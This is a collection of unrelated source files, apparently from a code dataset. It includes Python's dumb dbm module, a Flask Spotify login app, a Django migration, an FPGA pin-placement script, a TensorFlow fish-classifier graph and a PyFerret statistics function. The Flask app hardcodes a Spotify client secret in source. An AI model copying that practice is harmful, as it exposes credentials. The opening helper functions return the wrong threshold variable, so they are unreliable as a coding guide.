fbeta = 0
thr_bst = 0
for thr in range(0, 6):
Y_predicted = (predictions > (thr * 0.1))
f = metrics.fbeta_score(
true_labels, Y_predicted, beta=beta, average=average, **kwargs)
if f > fbeta:
fbeta = f
thr_bst = thr * 0.1
return fbeta, thr
def best_prec_score(true_labels, predictions, average='micro', **kwargs):
fbeta = 0
thr_bst = 0
for thr in range(0, 6):
Y_predicted = (predictions > (thr * 0.1))
f = metrics.average_precision_score(
true_labels, Y_predicted, average='micro', **kwargs)
if f > fbeta:
fbeta = f
thr_bst = thr * 0.1
return fbeta, thr
| 31.123288 | 82 | 0.65669 |
2296dbfd547eb76ecf38f6189c1549fc112e87d1
| 11,989 |
py
|
Python
|
contrib/tools/python3/src/Lib/dbm/dumb.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 36 |
2019-06-07T20:44:06.000Z
|
2022-03-23T06:19:43.000Z
|
contrib/tools/python3/src/Lib/dbm/dumb.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 42 |
2018-05-25T15:57:08.000Z
|
2021-01-17T18:39:59.000Z
|
contrib/tools/python3/src/Lib/dbm/dumb.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 28 |
2019-06-27T04:11:27.000Z
|
2022-03-11T06:27:44.000Z
|
"""A dumb and slow but simple dbm clone.
For database spam, spam.dir contains the index (a text file),
spam.bak *may* contain a backup of the index (also a text file),
while spam.dat contains the data (a binary file).
XXX TO DO:
- seems to contain a bug when updating...
- reclaim free space (currently, space once occupied by deleted or expanded
items is never reused)
- support concurrent access (currently, if two processes take turns making
updates, they can mess up the index)
- support efficient access to large databases (currently, the whole index
is read when the database is opened, and some updates rewrite the whole index)
- support opening for read-only (flag = 'm')
"""
import ast as _ast
import io as _io
import os as _os
import collections
__all__ = ["error", "open"]
_BLOCKSIZE = 512
error = OSError
class _Database(collections.MutableMapping):
# The on-disk directory and data files can remain in mutually
# inconsistent states for an arbitrarily long time (see comments
# at the end of __setitem__). This is only repaired when _commit()
# gets called. One place _commit() gets called is from __del__(),
# and if that occurs at program shutdown time, module globals may
# already have gotten rebound to None. Since it's crucial that
# _commit() finish successfully, we can't ignore shutdown races
# here, and _commit() must not reference any globals.
_os = _os # for _commit()
_io = _io # for _commit()
def __init__(self, filebasename, mode, flag='c'):
self._mode = mode
self._readonly = (flag == 'r')
# The directory file is a text file. Each line looks like
# "%r, (%d, %d)\n" % (key, pos, siz)
# where key is the string key, pos is the offset into the dat
# file of the associated value's first byte, and siz is the number
# of bytes in the associated value.
self._dirfile = filebasename + '.dir'
# The data file is a binary file pointed into by the directory
# file, and holds the values associated with keys. Each value
# begins at a _BLOCKSIZE-aligned byte offset, and is a raw
# binary 8-bit string value.
self._datfile = filebasename + '.dat'
self._bakfile = filebasename + '.bak'
# The index is an in-memory dict, mirroring the directory file.
self._index = None # maps keys to (pos, siz) pairs
# Handle the creation
self._create(flag)
self._update()
def _create(self, flag):
if flag == 'n':
for filename in (self._datfile, self._bakfile, self._dirfile):
try:
_os.remove(filename)
except OSError:
pass
# Mod by Jack: create data file if needed
try:
f = _io.open(self._datfile, 'r', encoding="Latin-1")
except OSError:
if flag not in ('c', 'n'):
import warnings
warnings.warn("The database file is missing, the "
"semantics of the 'c' flag will be used.",
DeprecationWarning, stacklevel=4)
with _io.open(self._datfile, 'w', encoding="Latin-1") as f:
self._chmod(self._datfile)
else:
f.close()
# Read directory file into the in-memory index dict.
def _update(self):
self._index = {}
try:
f = _io.open(self._dirfile, 'r', encoding="Latin-1")
except OSError:
self._modified = not self._readonly
else:
self._modified = False
with f:
for line in f:
line = line.rstrip()
key, pos_and_siz_pair = _ast.literal_eval(line)
key = key.encode('Latin-1')
self._index[key] = pos_and_siz_pair
# Write the index dict to the directory file. The original directory
# file (if any) is renamed with a .bak extension first. If a .bak
# file currently exists, it's deleted.
def _commit(self):
# CAUTION: It's vital that _commit() succeed, and _commit() can
# be called from __del__(). Therefore we must never reference a
# global in this routine.
if self._index is None or not self._modified:
return # nothing to do
try:
self._os.unlink(self._bakfile)
except OSError:
pass
try:
self._os.rename(self._dirfile, self._bakfile)
except OSError:
pass
with self._io.open(self._dirfile, 'w', encoding="Latin-1") as f:
self._chmod(self._dirfile)
for key, pos_and_siz_pair in self._index.items():
# Use Latin-1 since it has no qualms with any value in any
# position; UTF-8, though, does care sometimes.
entry = "%r, %r\n" % (key.decode('Latin-1'), pos_and_siz_pair)
f.write(entry)
sync = _commit
def _verify_open(self):
if self._index is None:
raise error('DBM object has already been closed')
def __getitem__(self, key):
if isinstance(key, str):
key = key.encode('utf-8')
self._verify_open()
pos, siz = self._index[key] # may raise KeyError
with _io.open(self._datfile, 'rb') as f:
f.seek(pos)
dat = f.read(siz)
return dat
# Append val to the data file, starting at a _BLOCKSIZE-aligned
# offset. The data file is first padded with NUL bytes (if needed)
# to get to an aligned offset. Return pair
# (starting offset of val, len(val))
def _addval(self, val):
with _io.open(self._datfile, 'rb+') as f:
f.seek(0, 2)
pos = int(f.tell())
npos = ((pos + _BLOCKSIZE - 1) // _BLOCKSIZE) * _BLOCKSIZE
f.write(b'\0'*(npos-pos))
pos = npos
f.write(val)
return (pos, len(val))
# Write val to the data file, starting at offset pos. The caller
# is responsible for ensuring that there's enough room starting at
# pos to hold val, without overwriting some other value. Return
# pair (pos, len(val)).
def _setval(self, pos, val):
with _io.open(self._datfile, 'rb+') as f:
f.seek(pos)
f.write(val)
return (pos, len(val))
# key is a new key whose associated value starts in the data file
# at offset pos and with length siz. Add an index record to
# the in-memory index dict, and append one to the directory file.
def _addkey(self, key, pos_and_siz_pair):
self._index[key] = pos_and_siz_pair
with _io.open(self._dirfile, 'a', encoding="Latin-1") as f:
self._chmod(self._dirfile)
f.write("%r, %r\n" % (key.decode("Latin-1"), pos_and_siz_pair))
def __setitem__(self, key, val):
if self._readonly:
import warnings
warnings.warn('The database is opened for reading only',
DeprecationWarning, stacklevel=2)
if isinstance(key, str):
key = key.encode('utf-8')
elif not isinstance(key, (bytes, bytearray)):
raise TypeError("keys must be bytes or strings")
if isinstance(val, str):
val = val.encode('utf-8')
elif not isinstance(val, (bytes, bytearray)):
raise TypeError("values must be bytes or strings")
self._verify_open()
self._modified = True
if key not in self._index:
self._addkey(key, self._addval(val))
else:
# See whether the new value is small enough to fit in the
# (padded) space currently occupied by the old value.
pos, siz = self._index[key]
oldblocks = (siz + _BLOCKSIZE - 1) // _BLOCKSIZE
newblocks = (len(val) + _BLOCKSIZE - 1) // _BLOCKSIZE
if newblocks <= oldblocks:
self._index[key] = self._setval(pos, val)
else:
# The new value doesn't fit in the (padded) space used
# by the old value. The blocks used by the old value are
# forever lost.
self._index[key] = self._addval(val)
# Note that _index may be out of synch with the directory
# file now: _setval() and _addval() don't update the directory
# file. This also means that the on-disk directory and data
# files are in a mutually inconsistent state, and they'll
# remain that way until _commit() is called. Note that this
# is a disaster (for the database) if the program crashes
# (so that _commit() never gets called).
def __delitem__(self, key):
if self._readonly:
import warnings
warnings.warn('The database is opened for reading only',
DeprecationWarning, stacklevel=2)
if isinstance(key, str):
key = key.encode('utf-8')
self._verify_open()
self._modified = True
# The blocks used by the associated value are lost.
del self._index[key]
# XXX It's unclear why we do a _commit() here (the code always
# XXX has, so I'm not changing it). __setitem__ doesn't try to
# XXX keep the directory file in synch. Why should we? Or
# XXX why shouldn't __setitem__?
self._commit()
def keys(self):
try:
return list(self._index)
except TypeError:
raise error('DBM object has already been closed') from None
def items(self):
self._verify_open()
return [(key, self[key]) for key in self._index.keys()]
def __contains__(self, key):
if isinstance(key, str):
key = key.encode('utf-8')
try:
return key in self._index
except TypeError:
if self._index is None:
raise error('DBM object has already been closed') from None
else:
raise
def iterkeys(self):
try:
return iter(self._index)
except TypeError:
raise error('DBM object has already been closed') from None
__iter__ = iterkeys
def __len__(self):
try:
return len(self._index)
except TypeError:
raise error('DBM object has already been closed') from None
def close(self):
try:
self._commit()
finally:
self._index = self._datfile = self._dirfile = self._bakfile = None
__del__ = close
def _chmod(self, file):
if hasattr(self._os, 'chmod'):
self._os.chmod(file, self._mode)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def open(file, flag='c', mode=0o666):
"""Open the database file, filename, and return corresponding object.
The flag argument, used to control how the database is opened in the
other DBM implementations, supports only the semantics of 'c' and 'n'
values. Other values will default to the semantics of 'c' value:
the database will always opened for update and will be created if it
does not exist.
The optional mode argument is the UNIX mode of the file, used only when
the database has to be created. It defaults to octal code 0o666 (and
will be modified by the prevailing umask).
"""
# Modify mode depending on the umask
try:
um = _os.umask(0)
_os.umask(um)
except AttributeError:
pass
else:
# Turn off any bits that are set in the umask
mode = mode & (~um)
if flag not in ('r', 'w', 'c', 'n'):
import warnings
warnings.warn("Flag must be one of 'r', 'w', 'c', or 'n'",
DeprecationWarning, stacklevel=2)
return _Database(file, mode, flag=flag)
| 36.889231 | 78 | 0.589957 |
7c06c302d8cf33521cdc895c1fd959b7bccd8ce7
| 1,879 |
py
|
Python
|
gestifyApi/api.py
|
canardaaydin/Hand-Gesture-Control-for-Spotify
|
7a88eac7ad60745b750346474ff34a5b67c09191
|
[
"MIT"
] | null | null | null |
gestifyApi/api.py
|
canardaaydin/Hand-Gesture-Control-for-Spotify
|
7a88eac7ad60745b750346474ff34a5b67c09191
|
[
"MIT"
] | null | null | null |
gestifyApi/api.py
|
canardaaydin/Hand-Gesture-Control-for-Spotify
|
7a88eac7ad60745b750346474ff34a5b67c09191
|
[
"MIT"
] | 1 |
2021-11-23T16:18:01.000Z
|
2021-11-23T16:18:01.000Z
|
from flask import Flask, render_template, make_response
from flask_restful import Resource, Api, request
import pprint
import requests
import base64
import spotipy
import spotipy.util as util
import json
app = Flask(__name__)
api = Api(app)
client_id = "d81ae7685f0240df9fc3e88c7698bc53"
secret_id = "439c9f6110554b16b95ae8add377da8a"
redirect_uri = "http://barda.life"
endpoint = "https://accounts.spotify.com/api/token"
auth_code = ""
def getPersonalInfo(token):
headers = {
"Accept": "application/json",
"Content-Type" : "application/json",
'Authorization': 'Bearer {0}'.format(token)
}
r = requests.get("https://api.spotify.com/v1/me", headers=headers)
response_data = json.loads(r.text)
return response_data
class get_auth_code(Resource):
def get(self):
auth_code = request.args.get('code')
auth_str = bytes('{}:{}'.format(client_id, secret_id), 'utf-8')
b64_auth_str = base64.b64encode(auth_str).decode('utf-8')
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic {}'.format(b64_auth_str)
}
code_payload = {
'grant_type': 'authorization_code',
'code': str(auth_code),
'redirect_uri': redirect_uri,
}
post_request = requests.post('https://accounts.spotify.com/api/token', data=code_payload, headers=headers)
response_data = json.loads(post_request.text)
#print(response_data)
access_token = response_data.get('access_token')
refresh_token = response_data.get('refresh_token')
personal_data = getPersonalInfo(access_token)
user_full_name = personal_data.get('display_name')
name = user_full_name.split()[0]
#print(name)
headers = {'Content-Type': 'text/html'}
return make_response(render_template('index.html', name=name), 200,headers)
api.add_resource(get_auth_code, '/')
if __name__ == '__main__':
app.run(port=5000, host='0.0.0.0')
| 23.197531 | 108 | 0.723789 |
898014b2091b7e026bfe9dfaf15324a72ffbbf12
| 437 |
py
|
Python
|
blogapp/migrations/0006_auto_20210314_1244.py
|
NitinPSingh/blogprojlive
|
769685f22218d31b8eb2195d65d9c3c351e02772
|
[
"MIT"
] | 1 |
2021-04-06T15:10:09.000Z
|
2021-04-06T15:10:09.000Z
|
blogapp/migrations/0006_auto_20210314_1244.py
|
NitinPSingh/blogprojlive
|
769685f22218d31b8eb2195d65d9c3c351e02772
|
[
"MIT"
] | null | null | null |
blogapp/migrations/0006_auto_20210314_1244.py
|
NitinPSingh/blogprojlive
|
769685f22218d31b8eb2195d65d9c3c351e02772
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-03-14 07:14
import ckeditor.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blogapp', '0005_auto_20210313_1746'),
]
operations = [
migrations.AlterField(
model_name='post',
name='body',
field=ckeditor.fields.RichTextField(blank=True, null=True),
),
]
| 21.85 | 72 | 0.590389 |
a04d0be6882ed93317904bd864c617462ff3f5d8
| 5,852 |
py
|
Python
|
quicklogic/common/utils/create_ioplace.py
|
bl0x/symbiflow-arch-defs
|
5fa5e71526e443d589971f2649d8b189df982d72
|
[
"ISC"
] | 183 |
2017-12-29T12:08:32.000Z
|
2022-02-15T03:29:07.000Z
|
quicklogic/common/utils/create_ioplace.py
|
bl0x/symbiflow-arch-defs
|
5fa5e71526e443d589971f2649d8b189df982d72
|
[
"ISC"
] | 1,832 |
2017-12-29T14:47:27.000Z
|
2022-02-18T06:30:43.000Z
|
quicklogic/common/utils/create_ioplace.py
|
bl0x/symbiflow-arch-defs
|
5fa5e71526e443d589971f2649d8b189df982d72
|
[
"ISC"
] | 96 |
2017-12-30T12:00:45.000Z
|
2022-02-17T09:03:46.000Z
|
#!/usr/bin/env python3
"""
Convert a PCF file into a VPR io.place file.
"""
import argparse
import csv
import sys
import re
from collections import defaultdict
import vpr_io_place
from pinmap_parse import read_pinmapfile_data
from pinmap_parse import vec_to_scalar
from lib.parse_pcf import parse_simple_pcf
# =============================================================================
BLOCK_INSTANCE_RE = re.compile(r"^(?P<name>\S+)\[(?P<index>[0-9]+)\]$")
# =============================================================================
def gen_io_def(args):
'''
Generate io.place file from pcf file
'''
io_place = vpr_io_place.IoPlace()
io_place.read_io_list_from_eblif(args.blif)
io_place.load_block_names_from_net_file(args.net)
# Load all the necessary data from the pinmap_xml
io_cells, port_map = read_pinmapfile_data(args.pinmap_xml)
# Map of pad names to VPR locations.
pad_map = defaultdict(lambda: dict())
with open(args.csv_file, mode='r') as csv_fp:
reader = csv.DictReader(csv_fp)
for line in reader:
port_name_list = vec_to_scalar(line['port_name'])
pin_name = vec_to_scalar(line['mapped_pin'])
gpio_type = line['GPIO_type']
if len(port_name_list) != len(pin_name):
print(
'CSV port name "{}" length does not match with mapped pin name "{}" length'
.format(line['port_name'], line['mapped_pin']),
file=sys.stderr
)
sys.exit(1)
for port, pin in zip(port_name_list, pin_name):
if port in port_map:
curr_map = port_map[port]
if gpio_type is None or gpio_type == '':
pad_map[pin] = (
int(curr_map.x), int(curr_map.y), int(curr_map.z)
)
else:
gpio_pin = pin + ":" + gpio_type.strip()
pad_map[gpio_pin] = (
int(curr_map.x), int(curr_map.y), int(curr_map.z)
)
else:
print(
'Port name "{}" specified in csv file "{}" is invalid. {} "{}"'
.format(
line['port_name'], args.csv_file,
"Specify from port names in xml file",
args.pinmap_xml
),
file=sys.stderr
)
sys.exit(1)
for pcf_constraint in parse_simple_pcf(args.pcf):
if (type(pcf_constraint).__name__ == 'PcfIoConstraint'):
pad_name = pcf_constraint.pad
if not io_place.is_net(pcf_constraint.net):
print(
'PCF constraint "{}" from line {} constraints net {} {}:\n{}'
.format(
pcf_constraint.line_str, pcf_constraint.line_num,
pcf_constraint.net, '\n'.join(io_place.get_nets()),
"which is not in available netlist"
),
file=sys.stderr
)
sys.exit(1)
if pad_name not in pad_map:
print(
'PCF constraint "{}" from line {} constraints pad {} {}:\n{}'
.format(
pcf_constraint.line_str, pcf_constraint.line_num,
pad_name, '\n'.join(sorted(pad_map.keys())),
"which is not in available pad map"
),
file=sys.stderr
)
sys.exit(1)
# Get the top-level block instance, strip its index
inst = io_place.get_top_level_block_instance_for_net(
pcf_constraint.net
)
if inst is None:
continue
match = BLOCK_INSTANCE_RE.match(inst)
assert match is not None, inst
inst = match.group("name")
# Constraint the net (block)
locs = pad_map[pad_name]
io_place.constrain_net(
net_name=pcf_constraint.net,
loc=locs,
comment=pcf_constraint.line_str
)
if io_place.constraints:
io_place.output_io_place(args.output)
# =============================================================================
def main():
'''
Convert a PCF file into a VPR io.place file
'''
parser = argparse.ArgumentParser(
description='Convert a PCF file into a VPR io.place file.'
)
parser.add_argument(
"--pcf",
"-p",
"-P",
type=argparse.FileType('r'),
required=True,
help='PCF input file'
)
parser.add_argument(
"--blif",
"-b",
type=argparse.FileType('r'),
required=True,
help='BLIF / eBLIF file'
)
parser.add_argument(
"--output",
"-o",
"-O",
type=argparse.FileType('w'),
default=sys.stdout,
help='The output io.place file'
)
parser.add_argument(
"--net",
"-n",
type=argparse.FileType('r'),
required=True,
help='top.net file'
)
parser.add_argument(
"--pinmap_xml",
type=str,
required=True,
help="Input pin-mapping xml file"
)
parser.add_argument(
"--csv_file",
type=str,
required=True,
help="Input user-defined pinmap CSV file"
)
args = parser.parse_args()
gen_io_def(args)
# =============================================================================
if __name__ == '__main__':
main()
| 30.8 | 95 | 0.476247 |
f9f7407df96d1761893906b874aa470ae813ff10
| 12,220 |
py
|
Python
|
FishyFish/FishyFish_GRAPH.py
|
CCThompson82/Kaggle_FF3
|
a8d68a8e33b213470d2b26d2115c6a5ac989af8d
|
[
"MIT"
] | null | null | null |
FishyFish/FishyFish_GRAPH.py
|
CCThompson82/Kaggle_FF3
|
a8d68a8e33b213470d2b26d2115c6a5ac989af8d
|
[
"MIT"
] | null | null | null |
FishyFish/FishyFish_GRAPH.py
|
CCThompson82/Kaggle_FF3
|
a8d68a8e33b213470d2b26d2115c6a5ac989af8d
|
[
"MIT"
] | null | null | null |
"""This script is the FishFinder graph for the Kaggle Nature Conservancy Fishery
Competition. It utilizes VGG-19 model as pre-trained weights during the
convolution steps"""
fishyfish = tf.Graph()
with fishyfish.as_default() :
# Variables
with tf.variable_scope('Variables') :
with tf.variable_scope('Convolutions') :
with tf.name_scope('Convolution_1') :
W_conv1 = tf.Variable(np.load(pretrained_path+'W_conv_1.npy'), trainable = False)
b_conv1 = tf.Variable(np.load(pretrained_path+'b_conv_1.npy'), trainable = False)
tf.summary.histogram('W_conv1', W_conv1)
tf.summary.histogram('b_conv1', b_conv1)
with tf.name_scope('Convolution_2') :
W_conv2 = tf.Variable(np.load(pretrained_path+'W_conv_2.npy'), trainable = False)
b_conv2 = tf.Variable(np.load(pretrained_path+'b_conv_2.npy'), trainable = False)
tf.summary.histogram('W_conv2', W_conv2)
tf.summary.histogram('b_conv2', b_conv2)
with tf.name_scope('Convolution_3') :
W_conv3 = tf.Variable(np.load(pretrained_path+'W_conv_3.npy'), trainable = False)
b_conv3 = tf.Variable(np.load(pretrained_path+'b_conv_3.npy'), trainable = False)
tf.summary.histogram('W_conv3', W_conv3)
tf.summary.histogram('b_conv3', b_conv3)
with tf.name_scope('Convolution_4') :
W_conv4 = tf.Variable(np.load(pretrained_path+'W_conv_4.npy'), trainable = False)
b_conv4 = tf.Variable(np.load(pretrained_path+'b_conv_4.npy'), trainable = False)
tf.summary.histogram('W_conv4', W_conv4)
tf.summary.histogram('b_conv4', b_conv4)
with tf.name_scope('Convolution_5') :
W_conv5 = tf.Variable(np.load(pretrained_path+'W_conv_5.npy'), trainable = False)
b_conv5 = tf.Variable(np.load(pretrained_path+'b_conv_5.npy'), trainable = False)
tf.summary.histogram('W_conv5', W_conv5)
tf.summary.histogram('b_conv5', b_conv5)
with tf.name_scope('Convolution_6') :
W_conv6 = tf.Variable(np.load(pretrained_path+'W_conv_6.npy'), trainable = False)
b_conv6 = tf.Variable(np.load(pretrained_path+'b_conv_6.npy'), trainable = False)
tf.summary.histogram('W_conv6', W_conv6)
tf.summary.histogram('b_conv6', b_conv6)
with tf.variable_scope('Dense_layers') :
with tf.name_scope('dense_1') :
W_fc1 = tf.Variable(tf.truncated_normal([nodes_after_conv, fc_depth[0]], stddev = stddev ))
b_fc1 = tf.Variable(tf.zeros([fc_depth[0]]))
tf.summary.histogram('W_fc1', W_fc1)
tf.summary.histogram('b_fc1', b_fc1)
with tf.name_scope('dense_2') :
W_fc2 = tf.Variable(tf.truncated_normal([fc_depth[0], fc_depth[1]], stddev = stddev ))
b_fc2 = tf.Variable(tf.zeros([fc_depth[1]]))
tf.summary.histogram('W_fc2', W_fc2)
tf.summary.histogram('b_fc2', b_fc2)
with tf.name_scope('dense_3') :
W_fc3 = tf.Variable(tf.truncated_normal([fc_depth[1], fc_depth[2]], stddev = stddev ))
b_fc3 = tf.Variable(tf.zeros([fc_depth[2]]))
tf.summary.histogram('W_fc3', W_fc3)
tf.summary.histogram('b_fc3', b_fc3)
with tf.name_scope('dense_4') :
W_fc4 = tf.Variable(tf.truncated_normal([(fc_depth[2]+32+1), fc_depth[3]], stddev = stddev ))
b_fc4 = tf.Variable(tf.zeros([fc_depth[3]]))
tf.summary.histogram('W_fc4', W_fc4)
tf.summary.histogram('b_fc4', b_fc4)
with tf.variable_scope('Classifiers') :
with tf.name_scope('FishNoF') :
W_clf = tf.Variable(tf.truncated_normal([fc_depth[3],num_labels], stddev = stddev))
b_clf = tf.Variable(tf.zeros([num_labels]))
tf.summary.histogram('W_clf', W_clf)
tf.summary.histogram('b_clf', b_clf)
def convolutions(data) :
"""
Emulates VGG-19 architecture.
"""
with tf.name_scope('Convolution') :
conv_layer = tf.nn.relu(
tf.nn.conv2d(data, filter = W_conv1,
strides = [1, 2, 2, 1],
padding = 'SAME') + b_conv1)
conv_layer = tf.nn.max_pool(
tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv2,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv2),
ksize = [1, pool_kernel, pool_kernel,1],
strides = [1, pool_stride, pool_stride, 1],
padding ='VALID')
conv_layer = tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv3,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv3)
conv_layer = tf.nn.max_pool(
tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv4,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv4),
ksize = [1, pool_kernel, pool_kernel,1],
strides = [1, pool_stride, pool_stride, 1],
padding ='VALID')
conv_layer = tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv5,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv5)
conv_layer = tf.nn.max_pool(tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv6,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv6),
ksize = [1, pool_kernel, pool_kernel,1],
strides = [1, pool_stride, pool_stride, 1],
padding ='VALID')
return conv_layer
def dense_layers(data, embedding, FiNoF, keep_prob) :
"""
Executes a series of dense layers.
"""
def fc(data, W, b, keep_prob = keep_prob) :
"""Convenience function for dense layer with dropout"""
fc = tf.nn.dropout(
tf.nn.tanh(
tf.matmul(data, W) + b,
),
keep_prob)
return fc
fc_layer = fc(data, W_fc1, b_fc1, keep_prob[0])
fc_layer = fc(fc_layer, W_fc2, b_fc2, keep_prob[1])
fc_layer = fc(fc_layer, W_fc3, b_fc3, keep_prob[2])
fc_layer = tf.concat(1, [fc_layer, embedding, FiNoF])
print(fc_layer)
fc_layer = fc(fc_layer, W_fc4, b_fc4, keep_prob[3])
return fc_layer
with tf.name_scope('Training') :
with tf.name_scope('Input') :
fovea = tf.placeholder(tf.float32, shape = [batch_size, 64, 64, num_channels])
embedding = tf.placeholder(tf.float32, shape = [batch_size, 32])
fish_prob = tf.placeholder(tf.float32, shape = [batch_size, 1])
labels = tf.placeholder(tf.float32, shape = [batch_size,num_labels])
fovea_weights = tf.placeholder(tf.float32, shape = [batch_size, 1])
label_weights = tf.placeholder(tf.float32, shape = [batch_size, 1])
gamma_fovea = tf.placeholder(tf.float32, shape = ())
gamma_label = tf.placeholder(tf.float32, shape = ())
learning_rate = tf.placeholder(tf.float32, shape = () )
beta_regularizer = tf.placeholder(tf.float32, shape = ())
with tf.name_scope('Network') :
conv_output = convolutions(fovea)
dense_input = tf.contrib.layers.flatten(conv_output)
dense_output = dense_layers(dense_input, embedding, fish_prob, keep_prob = keep_prob)
with tf.name_scope('Classifiers') :
logits = tf.matmul(dense_output, W_clf) + b_clf
with tf.name_scope('Backpropigation') :
xent = tf.nn.softmax_cross_entropy_with_logits(
logits = logits, labels = labels)
fovea_cost = gamma_fovea*tf.reduce_mean(tf.multiply(xent, fovea_weights))
label_cost = gamma_label*tf.reduce_mean(tf.multiply(xent, label_weights))
regularization_term = (tf.nn.l2_loss(W_fc4) +
tf.nn.l2_loss(W_fc3) +
tf.nn.l2_loss(W_fc2) +
tf.nn.l2_loss(W_fc1)
) * beta_regularizer
cost = tf.reduce_mean(xent) + fovea_cost + label_cost + regularization_term
train_op = tf.train.AdagradOptimizer(learning_rate).minimize(cost)
with tf.name_scope('Validation') :
with tf.name_scope('Input') :
val_fovea = tf.placeholder(tf.float32, shape = [valid_size, 64, 64, num_channels])
val_embedding = tf.placeholder(tf.float32, shape = [valid_size, 32])
val_fish_prob = tf.placeholder(tf.float32, shape = [valid_size, 1])
val_labels = tf.placeholder(tf.float32, shape = [valid_size, num_labels])
with tf.name_scope('Network') :
v_conv_output = convolutions(val_fovea)
v_dense_input = tf.contrib.layers.flatten(v_conv_output)
v_dense_output = dense_layers(v_dense_input, val_embedding, val_fish_prob, keep_prob = [1.0, 1.0, 1.0, 1.0])
with tf.name_scope('Classifiers') :
val_logits = tf.matmul(v_dense_output, W_clf) + b_clf
with tf.name_scope('Metrics') :
val_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits = val_logits, labels = val_labels))
val_acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(val_logits, 1), tf.argmax(val_labels, 1)), dtype = tf.float32))
with tf.name_scope('Summaries') :
with tf.name_scope('Valid_Set') :
tf.summary.scalar('Accuracy_FiNoF', val_acc)
tf.summary.scalar('CrossEntropy', val_loss)
with tf.name_scope('Parameters') :
tf.summary.scalar('LearningRate', learning_rate)
tf.summary.scalar('Regularization_Coefficient', beta_regularizer)
tf.summary.scalar('Fovea_Cost_Coefficient', gamma_fovea)
tf.summary.scalar('Label_Cost_Coefficient', gamma_label)
with tf.name_scope('Train_Set') :
tf.summary.scalar('NaiveCrossEntropy', tf.reduce_mean(xent))
tf.summary.scalar('Regularization', regularization_term)
tf.summary.scalar('Fovea_cost', fovea_cost)
tf.summary.scalar('Label_cost', label_cost)
tf.summary.scalar("Cost", cost)
summaries = tf.summary.merge_all()
with tf.name_scope('Prediction') :
with tf.name_scope('Input') :
test_fovea = tf.placeholder(tf.float32, shape = [None, 64, 64, num_channels])
test_embedding = tf.placeholder(tf.float32, shape = [None, 32])
test_fish_prob = tf.placeholder(tf.float32, shape = [None, 1])
with tf.name_scope('Network') :
t_conv_output = convolutions(test_fovea)
t_dense_input = tf.contrib.layers.flatten(t_conv_output)
t_dense_output = dense_layers(t_dense_input, test_embedding, test_fish_prob, keep_prob = [1.0, 1.0, 1.0, 1.0])
with tf.name_scope('Classifiers') :
test_logits = tf.matmul(t_dense_output, W_clf) + b_clf
test_predictions = tf.nn.softmax(test_logits)
| 54.070796 | 127 | 0.556383 |
4cab16270ad0c783b99089bbeb7793fe05e39245
| 3,523 |
py
|
Python
|
pyfermod/stats/stats_isf.py
|
josborne-noaa/PyFerret
|
8496508e9902c0184898522e9f89f6caea6d4539
|
[
"Unlicense"
] | 44 |
2016-03-18T22:05:31.000Z
|
2021-12-23T01:50:09.000Z
|
pyfermod/stats/stats_isf.py
|
josborne-noaa/PyFerret
|
8496508e9902c0184898522e9f89f6caea6d4539
|
[
"Unlicense"
] | 88 |
2016-08-19T08:05:37.000Z
|
2022-03-28T23:29:21.000Z
|
pyfermod/stats/stats_isf.py
|
josborne-noaa/PyFerret
|
8496508e9902c0184898522e9f89f6caea6d4539
|
[
"Unlicense"
] | 24 |
2016-02-07T18:12:06.000Z
|
2022-02-19T09:06:17.000Z
|
"""
Returns the array of inverse survival function values for
a probability distribution and set of quantile values.
"""
from __future__ import print_function
import numpy
import scipy.stats
import pyferret
import pyferret.stats
def ferret_init(id):
"""
Initialization for the stats_isf python-backed ferret external function
"""
axes_values = [ pyferret.AXIS_IMPLIED_BY_ARGS ] * pyferret.MAX_FERRET_NDIM
true_influences = [ True ] * pyferret.MAX_FERRET_NDIM
false_influences = [ False ] * pyferret.MAX_FERRET_NDIM
retdict = { "numargs": 3,
"descript": "Returns inverse survival function values for a probability distribution",
"axes": axes_values,
"argnames": ("PROBS", "PDNAME", "PDPARAMS"),
"argdescripts": ("Probabilities (0-1) at which to calculate the inverse survival function values",
"Name of a probability distribution",
"Parameters for this probability distribution"),
"argtypes": (pyferret.FLOAT_ARRAY, pyferret.STRING_ONEVAL, pyferret.FLOAT_ARRAY),
"influences": (true_influences, false_influences, false_influences),
}
return retdict
def ferret_compute(id, result, resbdf, inputs, inpbdfs):
"""
Assigns result with the inverse survival function values for the probability
distribution indicated by inputs[1] (a string) using the parameters given in
inputs[2] at the quantile values given by inputs[0]. For undefined quantile
values, the result value will be undefined.
"""
distribname = inputs[1]
distribparams = inputs[2].reshape(-1)
distrib = pyferret.stats.getdistrib(distribname, distribparams)
badmask = ( numpy.fabs(inputs[0] - inpbdfs[0]) < 1.0E-5 )
badmask = numpy.logical_or(badmask, numpy.isnan(inputs[0]))
goodmask = numpy.logical_not(badmask)
result[badmask] = resbdf
# array[goodmask] is a flattened array
result[goodmask] = distrib.isf(inputs[0][goodmask])
#
# The rest of this is just for testing this module at the command line
#
if __name__ == "__main__":
# make sure ferret_init does not have problems
info = ferret_init(0)
# Normal distribution along the Y axis
dimen = 25
mu = 5.0
sigma = 2.0
distf = scipy.stats.norm(mu, sigma)
qvals = numpy.linspace(0.05, 0.95, dimen)
isfvals = distf.isf(qvals)
pfname = "norm"
pfparams = numpy.array([mu, sigma], dtype=numpy.float64)
